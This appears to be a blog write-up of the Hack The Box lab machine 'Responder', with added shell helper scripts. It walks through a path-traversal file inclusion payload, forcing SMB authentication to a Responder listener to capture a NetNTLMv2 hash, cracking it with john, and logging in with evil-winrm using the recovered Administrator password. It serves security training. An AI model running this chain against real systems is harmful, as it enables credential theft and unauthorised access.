HTB-Responder

2022-10-17 / 0 comments / 0 likes / 54 reads / 605 characters

Keywords:

  • SAMBA

  • Enumeration

  • Apache

  • WinRM

Approach:

  1. Get the target IP.
  2. Scan the open services with nmap.
  3. Find the website. The URL carries a page= parameter, so try a path-traversal file inclusion payload: ../../../../../../../../windows/system32/drivers/etc/hosts
  4. The hosts file comes back, which confirms a local file inclusion. Including a remote http:// URL is restricted, but PHP on Windows treats //host/share/file as a UNC path, so pointing page= at an SMB listener we control makes the web server authenticate to us; Responder captures the NetNTLMv2 challenge-response.
  5. Crack the captured NetNTLMv2 hash with John the Ripper (a dictionary attack, not decryption; the response is a keyed hash and cannot be reversed) to recover the Administrator password.
  6. Log in to the Windows host with evil-winrm and read the flag.

Walkthrough

nmap scan

nmap -sV -p- --min-rate 5000 ip
-sV : probe the open ports to identify the service and its version
-p- : scan all 65535 TCP ports
--min-rate : send at least this many packets per second (5000 makes the full-port scan fast; lower it if ports appear to be missing)

Website vulnerability

http://unika.htb/index.php?page=french.html
# page= takes a file name, so try a file inclusion payload
http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts

The response contains the Windows hosts file. Eight ../ is more than the web root depth requires; once the traversal reaches the drive root Windows ignores the extra ..\ segments, so over-shooting is harmless.

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost

Local file inclusion (LFI)

The application builds the path of the file it includes from user input. An attacker can put ../ sequences in the file name to walk out of the web root and read sensitive files on the local file system (here the hosts file; on PHP targets the application's own source and configuration files are also worth reading). In some limited cases LFI leads to code execution, for example when a file whose contents the attacker controls (an upload or a log) can be included and is parsed as PHP.

Remote file inclusion (RFI)

RFI is similar to LFI, but here the attacker can make the host load a remote file over protocols such as HTTP or FTP. In PHP this needs allow_url_include, which is off by default, so a plain http:// payload usually fails. A UNC path (//host/share/file) is not a URL wrapper: PHP hands it to the Windows file API, which opens an SMB connection and authenticates as the web server's account. That is what makes the Responder capture below work even though true RFI is blocked.
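A small helper, added here as an example and not part of the original writeup, that works out the traversal depth rather than guessing eight ../ segments and checks the response for the stock hosts-file comment. The fetcher is passed in as a command so the logic can be exercised offline: fake_fetch is a constructed stand-in that pretends the include root sits three directories below C:\ (that depth is an assumption of the mock); against the real box you would pass http_fetch (curl) instead. The base URL and the page parameter are the ones from the page.

```shell
#!/usr/bin/env sh
# Added example, not from the original writeup: locate the smallest number of
# "../" that reaches the Windows hosts file through the page= parameter.
set -eu

# First comment line of every stock Windows hosts file; a cheap, reliable
# indicator that the include worked.
HOSTS_MARKER='sample HOSTS file used by Microsoft TCP/IP for Windows'

# lfi_payload DEPTH TARGET -> DEPTH copies of "../" followed by TARGET
lfi_payload() {
  depth=$1; target=$2; p=''; i=0
  while [ "$i" -lt "$depth" ]; do
    p="$p../"
    i=$((i + 1))
  done
  printf '%s%s\n' "$p" "$target"
}

# looks_like_hosts_file < response_body -> exit 0 if the marker is present
looks_like_hosts_file() {
  grep -q "$HOSTS_MARKER"
}

# find_lfi_depth FETCHER BASE_URL PARAM MAX_DEPTH
#   FETCHER: a command taking one URL and printing the response body.
#   Prints the first depth whose response looks like the hosts file,
#   returns 1 if none of 1..MAX_DEPTH works.
find_lfi_depth() {
  fetcher=$1; base=$2; param=$3; max=$4; d=1
  while [ "$d" -le "$max" ]; do
    url="${base}?${param}=$(lfi_payload "$d" windows/system32/drivers/etc/hosts)"
    if "$fetcher" "$url" | looks_like_hosts_file; then
      printf '%s\n' "$d"
      return 0
    fi
    d=$((d + 1))
  done
  return 1
}

# Real fetcher for the box, not called in this offline run:
#   find_lfi_depth http_fetch http://unika.htb/index.php page 10
http_fetch() {
  curl -s --max-time 10 "$1"
}

# count_dotdot STRING -> number of "../" sequences in STRING
count_dotdot() {
  s=$1; n=0
  while [ "${s#*../}" != "$s" ]; do
    s=${s#*../}
    n=$((n + 1))
  done
  printf '%s\n' "$n"
}

# Constructed offline stand-in for the target (assumption: the web root is
# three directories below C:\). Three or more "../" reach the hosts file;
# Windows ignores extra "..\" at the drive root, which is why the writeup's
# eight-deep payload also worked. Anything shallower gets an include warning.
fake_fetch() {
  if [ "$(count_dotdot "$1")" -ge 3 ]; then
    printf '# Copyright (c) 1993-2009 Microsoft Corp.\n#\n'
    printf '# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\n'
  else
    printf 'Warning: include(%s): Failed to open stream\n' "$1"
  fi
}

# Offline run against the stand-in; prints 3, the minimum working depth.
find_lfi_depth fake_fetch http://unika.htb/index.php page 10
```

The minimum depth tells you how deep the web root sits, which is useful when you later want to include application files by relative path instead of the hosts file.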

Capturing NetNTLMv2 with Responder

Install Responder and start it listening on the VPN interface:
# fetch Responder
git clone https://github.com/lgandx/Responder
# look at the configuration (which servers are enabled, where logs go)
cat Responder.conf
# install the Python dependencies
pip3 install -r requirements.txt
pacman -S python-netifaces   # Arch only; on other distros pip installs netifaces
# run it on the interface the target can reach (the HTB VPN tunnel)
sudo python3 Responder.py -I tun0

Now make the website connect back to the attacking machine's tun0 address over SMB. Replace ip with your own tun0 address; somefile does not need to exist, because the SMB client authenticates during session setup, before the file open can fail:
http://unika.htb/index.php?page=//ip/somefile

Responder prints the captured NetNTLMv2 response. The account is the one the web server runs as, here Administrator:
[SMB] NTLMv2-SSP Client   : 10.129.57.172
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:d8f31ec8876dc…

Cracking the hash with john

# save the hash line exactly as Responder printed it, one hash per line
echo "Administrator::RESPONDER:d8f31ec8876dc…" > hash.txt

# dictionary attack; john recognises the netntlmv2 format from the line layout
john -w=/wordlist/rockyou.txt hash.txt
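The capture and cracking steps above, as an added shell example that is not part of the original writeup: it takes Responder's console output (or the per-client files Responder writes under its logs/ directory), strips the log prefix, keeps only lines with the NetNTLMv2 field layout user::domain:challenge:NTProofStr:blob, and keeps one hash per account, since Responder logs a new challenge-response for every connection and john only needs one. SAMPLE_LOG is constructed data with placeholder hex of the right lengths, not the box's real hash.

```shell
#!/usr/bin/env sh
# Added example, not from the original writeup: turn Responder output into a
# hash file for john/hashcat, keeping one well-formed NetNTLMv2 line per account.
#
# NetNTLMv2 as Responder prints it (one line, colon separated):
#   USER::DOMAIN:SERVER_CHALLENGE(16 hex):NTPROOFSTR(32 hex):BLOB(hex)
set -eu

# Field layout check. The server challenge is 8 bytes and NTProofStr is the
# 16-byte HMAC-MD5, so their hex lengths are fixed; the blob is variable.
NETNTLMV2_RE='^[^:]+::[^:]*:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]+$'

# Constructed sample of Responder's console output. The hex values are
# placeholders of the right length, not a real capture. The same account
# appears twice (second connection, new challenge) and the last line is
# deliberately malformed.
SAMPLE_LOG=$(cat <<'EOF'
[SMB] NTLMv2-SSP Client   : 10.129.57.172
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:1122334455667788:00112233445566778899aabbccddeeff:0101000000000000c0653150de09d20100000000000000000000000000000000
[SMB] NTLMv2-SSP Client   : 10.129.57.172
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:8877665544332211:ffeeddccbbaa99887766554433221100:0101000000000000c0653150de09d20100000000000000000000000000000000
[SMB] NTLMv2-SSP Hash     : broken::RESPONDER:zz:notahash
EOF
)

# valid_netntlmv2 HASH -> exit 0 if HASH has the expected field layout
valid_netntlmv2() {
  printf '%s\n' "$1" | grep -Eq "$NETNTLMV2_RE"
}

# extract_hashes < responder_output -> well-formed hashes, first one per user::domain
# Accepts the console output (prefix stripped by sed) and the raw per-client
# files under logs/ (no prefix, so the lines pass through sed unchanged).
# CRLF line endings are tolerated.
extract_hashes() {
  tr -d '\r' \
    | sed -e 's/^.*NTLMv2-SSP Hash[[:space:]]*: *//' \
    | grep -E "$NETNTLMV2_RE" \
    | awk -F: '{ key = $1 "::" $3 } !(key in seen) { seen[key] = 1; print }'
}

# Offline demonstration on the constructed log; prints the first
# Administrator hash only (duplicate and malformed lines are dropped).
printf '%s\n' "$SAMPLE_LOG" | extract_hashes

# Against a real capture:
#   cat logs/SMB-NTLMv2-SSP-*.txt | extract_hashes > hash.txt
#   john --format=netntlmv2 --wordlist=/wordlist/rockyou.txt hash.txt
```

Deduplicating per account matters for time: every connection yields a different challenge and therefore a different hash line, and john would otherwise run the whole wordlist against each of them for the same password.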

WinRM login

WinRM (TCP 5985) was among the open ports in the nmap scan, so the cracked password can be used for a remote shell:
evil-winrm -i 10.129.136.91 -u administrator -p badminton

References

rockyou.txt

What is NTLM?

john the ripper

responder

evil-winrm
